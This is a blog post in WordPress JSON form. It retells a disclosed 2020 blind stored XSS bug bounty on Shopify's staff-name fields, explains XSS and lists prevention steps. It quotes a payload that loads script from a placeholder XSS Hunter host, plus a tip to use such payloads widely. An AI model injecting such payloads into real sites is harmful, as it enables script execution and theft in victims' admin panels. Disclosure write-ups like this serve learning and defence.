{"id":1740,"date":"2023-02-13T15:29:08","date_gmt":"2023-02-13T15:29:08","guid":{"rendered":"https:\/\/secry.me\/explore\/?p=1740"},"modified":"2023-07-06T09:23:34","modified_gmt":"2023-07-06T09:23:34","slug":"indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter","status":"publish","type":"post","link":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/","title":{"rendered":"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter"},"content":{"rendered":"<div class=\"c7f5092f831f91fb6af859cc3a8052cc\" data-index=\"4\" style=\"float: none; margin:10px 0 10px 0; text-align:center;\">\n<script async src=\"https:\/\/securepubads.g.doubleclick.net\/tag\/js\/gpt.js\"><\/script>\r\n<script>\r\n  window.googletag = window.googletag || {cmd: []};\r\n  googletag.cmd.push(function() {\r\n    googletag.defineSlot('\/22608490431\/iklan1', [[320, 100], [300, 50]], 'div-gpt-ad-1696178236578-0').addService(googletag.pubads());\r\n    googletag.pubads().enableSingleRequest();\r\n    googletag.enableServices();\r\n  });\r\n<\/script>\r\n<!-- \/22608490431\/iklan1 -->\r\n<div id='div-gpt-ad-1696178236578-0' style='min-width: 300px; min-height: 50px;'>\r\n  <script>\r\n    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1696178236578-0'); });\r\n  <\/script>\r\n<\/div>\n<\/div>\n<h2>What is Cross Site Scripting (XSS) ?<\/h2>\n<p><strong>Cross Site Scripting<\/strong> (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that other users view. This can lead to the theft of important information like login details, and allow the attacker to carry out unauthorized activities on the targeted website. It&#8217;s kind of like a burglar sneaking into a house and planting a hidden camera, giving them access to all the personal information and activities of the homeowners. It&#8217;s a serious issue that can cause a lot of harm if not addressed.<\/p>\n<p>&nbsp;<\/p>\n<h2>The Story of Blind XSS Using XSS Hunter<\/h2>\n<p><em>In 2020, <strong>rioncool22<\/strong>, a bug hunter based in North Sumatera, Indonesia, submitted a report to <strong>Shopify<\/strong> about a potential vulnerability in their website. He was familiar with the site, as he had conducted multiple bug searches and submitted reports in the past, although with little success. <\/em><\/p>\n<p>However, after reading a report about blind cross-site scripting (XSS) from <strong>Hacktivity<\/strong>, <strong>rioncool22<\/strong> decided to try the same approach on Shopify&#8217;s site using XSS Hunter.<\/p>\n<p>To his surprise, the payload was executed in the admin panel.<\/p>\n<p>Rioncool22 reproduced the vulnerability by going to the &#8220;<em><a href=\"https:\/\/your-store.myshopify.com\/admin\/settings\/account\" target=\"_new\" rel=\"noopener\">https:\/\/your-store.myshopify.com\/admin\/settings\/account<\/a><\/em>&#8221; page, adding a staff account, and filling in the first and last name fields with the xss hunter payload <strong><em>&#8220;&gt;&lt;script&gt;$.getScript(&#8220;\/\/xsshunterdomain&#8221;)&lt;\/script&gt;&#8221;<\/em><\/strong>. The XSS was then fired in the admin panel.<\/p>\n<p>&nbsp;<\/p>\n<h3>Tips for XSS Vulnerability<\/h3>\n<p>Rioncool22 offered a helpful tip for other security researchers searching for XSS bugs:<\/p>\n<p><strong><em>&#8220;Tips: if you&#8217;re searching for XSS vulnerabilities, change your payload with the XSS Hunter payload, because you won&#8217;t know where the payload will be executed.&#8221;<\/em><\/strong><\/p>\n<p>Shopify responded to the report four days later and quickly triaged the issue. Within a week, the vulnerability was resolved and rioncool22 was rewarded with a monetary payout <em>(<\/em><strong>$$$$<\/strong><em>)<\/em>. The public disclosure was made on August 19th 2020.<\/p>\n<p>&nbsp;<\/p>\n<h2>How to Prevent XSS Attack?<\/h2>\n<p>To prevent XSS attacks, follow these steps:<\/p>\n<ol>\n<li>Input validation: Implement strict input validation for all user-generated content, including form fields, search boxes, and message boards. This should include checks to ensure that user input only contains valid characters and is of the expected length.<\/li>\n<li>Output encoding: Encode all output that includes user-generated content to prevent it from being interpreted as code. This includes data displayed on web pages, as well as data stored in databases and passed between applications.<\/li>\n<li>Use secure coding practices: Ensure that all code follows secure coding practices, such as avoiding the use of eval(), avoiding inline event handlers, and using parameterized queries when accessing databases.<\/li>\n<li>Use security-focused browser extensions: Install security-focused browser extensions, such as NoScript, to block scripts from untrusted sources and prevent them from executing on your site.<\/li>\n<li>Keep software up to date: Keep all software up to date with the latest security patches and upgrades, including your web server software, content management system, and any third-party plugins or extensions.<\/li>\n<\/ol>\n<p>By implementing these steps, you can help prevent XSS attacks and ensure the security of your website and user data.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>Link to write up: <\/strong><em><a href=\"https:\/\/secry.me\/explore\/j6wr\">here<\/a><\/em><\/p>\n<p><strong>Save the PDF <\/strong><a href=\"https:\/\/secry.me\/\/explore\/pdf-story\/XSS\/(Shopify.com)%20Blind%20Stored%20XSS%20Via%20Staff%20Name%20$$$$%20%E2%80%93%20Apapedulimu.pdf\"><em>here<\/em><\/a><\/p>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban_overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n<div id=\"urban-overlay\" style=\"left: -10px; top: -10px; width: 0px; height: 0px;\"><\/div>\n\n<div style=\"font-size: 0px; height: 0px; line-height: 0px; margin: 0; padding: 0; clear: both;\"><\/div>","protected":false},"excerpt":{"rendered":"<p>What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that other users view. This can lead to the theft of important information like login details, and allow the attacker to carry out unauthorized activities on the [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1741,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[136,120],"tags":[174,13,159,123,175],"class_list":{"0":"post-1740","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bug-bounty","8":"category-xss","9":"tag-blind-xss","10":"tag-bug-bounty","11":"tag-shopify","12":"tag-xss","13":"tag-xss-hunter"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v21.4 (Yoast SEO v27.6) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter | SECRY<\/title>\n<meta name=\"description\" content=\"What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter | SECRY\" \/>\n<meta property=\"og:description\" content=\"What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that\" \/>\n<meta property=\"og:url\" content=\"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/\" \/>\n<meta property=\"og:site_name\" content=\"SECRY\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/secry.me\" \/>\n<meta property=\"article:published_time\" content=\"2023-02-13T15:29:08+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-07-06T09:23:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/02\/SHOPIFY-BLIND-XSS.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1280\" \/>\n\t<meta property=\"og:image:height\" content=\"720\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Christin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Christin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"NewsArticle\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/\"},\"author\":{\"name\":\"Christin\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\"},\"headline\":\"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter\",\"datePublished\":\"2023-02-13T15:29:08+00:00\",\"dateModified\":\"2023-07-06T09:23:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/\"},\"wordCount\":535,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/SHOPIFY-BLIND-XSS.png\",\"keywords\":[\"Blind XSS\",\"Bug Bounty\",\"shopify\",\"xss\",\"XSS hunter\"],\"articleSection\":[\"Bug Bounty\",\"XSS\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/\",\"name\":\"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter | SECRY\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/SHOPIFY-BLIND-XSS.png\",\"datePublished\":\"2023-02-13T15:29:08+00:00\",\"dateModified\":\"2023-07-06T09:23:34+00:00\",\"description\":\"What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#primaryimage\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/SHOPIFY-BLIND-XSS.png\",\"contentUrl\":\"https:\\\/\\\/secry.me\\\/explore\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/SHOPIFY-BLIND-XSS.png\",\"width\":1280,\"height\":720,\"caption\":\"SHOPIFY BLIND XSS\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/secry.me\\\/explore\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#website\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"name\":\"SECRY\",\"description\":\"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections\",\"publisher\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\"},\"alternateName\":\"Security Story\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/secry.me\\\/explore\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#organization\",\"name\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\",\"alternateName\":\"SECRY\",\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"contentUrl\":\"https:\\\/\\\/secryweb.sirv.com\\\/WP_secry.me\\\/2022\\\/06\\\/cropped-SECRY.webp\",\"width\":512,\"height\":512,\"caption\":\"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections\"},\"image\":{\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/secry.me\",\"https:\\\/\\\/pinterest.com\\\/secry_me\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/secry.me\\\/explore\\\/#\\\/schema\\\/person\\\/bf08de9f590b8968a1d054728257190f\",\"name\":\"Christin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g\",\"caption\":\"Christin\"},\"description\":\"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.\",\"sameAs\":[\"https:\\\/\\\/secry.me\\\/explore\"],\"url\":\"https:\\\/\\\/secry.me\\\/explore\\\/author\\\/secry\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter | SECRY","description":"What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/","og_locale":"en_US","og_type":"article","og_title":"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter | SECRY","og_description":"What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that","og_url":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/","og_site_name":"SECRY","article_publisher":"https:\/\/www.facebook.com\/secry.me","article_published_time":"2023-02-13T15:29:08+00:00","article_modified_time":"2023-07-06T09:23:34+00:00","og_image":[{"width":1280,"height":720,"url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/02\/SHOPIFY-BLIND-XSS.png","type":"image\/png"}],"author":"Christin","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Christin","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"NewsArticle","@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#article","isPartOf":{"@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/"},"author":{"name":"Christin","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/bf08de9f590b8968a1d054728257190f"},"headline":"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter","datePublished":"2023-02-13T15:29:08+00:00","dateModified":"2023-07-06T09:23:34+00:00","mainEntityOfPage":{"@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/"},"wordCount":535,"commentCount":0,"publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"image":{"@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/02\/SHOPIFY-BLIND-XSS.png","keywords":["Blind XSS","Bug Bounty","shopify","xss","XSS hunter"],"articleSection":["Bug Bounty","XSS"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/","url":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/","name":"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter | SECRY","isPartOf":{"@id":"https:\/\/secry.me\/explore\/#website"},"primaryImageOfPage":{"@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#primaryimage"},"image":{"@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#primaryimage"},"thumbnailUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/02\/SHOPIFY-BLIND-XSS.png","datePublished":"2023-02-13T15:29:08+00:00","dateModified":"2023-07-06T09:23:34+00:00","description":"What is Cross Site Scripting (XSS) ? Cross Site Scripting (XSS) is a type of cyber attack where an attacker sneaks in harmful code into a web page that","breadcrumb":{"@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#primaryimage","url":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/02\/SHOPIFY-BLIND-XSS.png","contentUrl":"https:\/\/secry.me\/explore\/wp-content\/uploads\/2023\/02\/SHOPIFY-BLIND-XSS.png","width":1280,"height":720,"caption":"SHOPIFY BLIND XSS"},{"@type":"BreadcrumbList","@id":"https:\/\/secry.me\/explore\/indonesian-bug-hunter-rewarded-4-digits-bounty-for-shopify-blind-xss-using-xss-hunter\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/secry.me\/explore\/"},{"@type":"ListItem","position":2,"name":"Indonesian Bug Hunter Rewarded 4 Digits Bounty for Shopify Blind XSS Using XSS Hunter"}]},{"@type":"WebSite","@id":"https:\/\/secry.me\/explore\/#website","url":"https:\/\/secry.me\/explore\/","name":"SECRY","description":"#1 Cyber [SEC]urity Sto[RY]  -  News &amp; Bug Bounty Story Collections","publisher":{"@id":"https:\/\/secry.me\/explore\/#organization"},"alternateName":"Security Story","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/secry.me\/explore\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/secry.me\/explore\/#organization","name":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections","alternateName":"SECRY","url":"https:\/\/secry.me\/explore\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/","url":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","contentUrl":"https:\/\/secryweb.sirv.com\/WP_secry.me\/2022\/06\/cropped-SECRY.webp","width":512,"height":512,"caption":"#1 Cyber [SEC]urity Sto[RY] - News & Bug Bounty Story Collections"},"image":{"@id":"https:\/\/secry.me\/explore\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/secry.me","https:\/\/pinterest.com\/secry_me"]},{"@type":"Person","@id":"https:\/\/secry.me\/explore\/#\/schema\/person\/bf08de9f590b8968a1d054728257190f","name":"Christin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/b5497f25505814356d5235813688d08a9e63670586640e4bb29680889eabcc9b?s=96&d=robohash&r=g","caption":"Christin"},"description":"A cybersecurity practitioner with more than 5 years of experience in the cybersecurity world. Has an interest in creating simple blog websites, learning about SEO and graphic design, writing, AI, and understanding the concepts of journalism. Intentionally created this website to make the world of cybersecurity more engaging by combining it with journalistic principles and presenting cybersecurity stories that are easy to understand, which can help anyone who wants to develop in the cybersecurity world.","sameAs":["https:\/\/secry.me\/explore"],"url":"https:\/\/secry.me\/explore\/author\/secry\/"}]}},"_links":{"self":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/1740","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/comments?post=1740"}],"version-history":[{"count":20,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/1740\/revisions"}],"predecessor-version":[{"id":2845,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/posts\/1740\/revisions\/2845"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media\/1741"}],"wp:attachment":[{"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/media?parent=1740"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/categories?post=1740"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/secry.me\/explore\/wp-json\/wp\/v2\/tags?post=1740"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}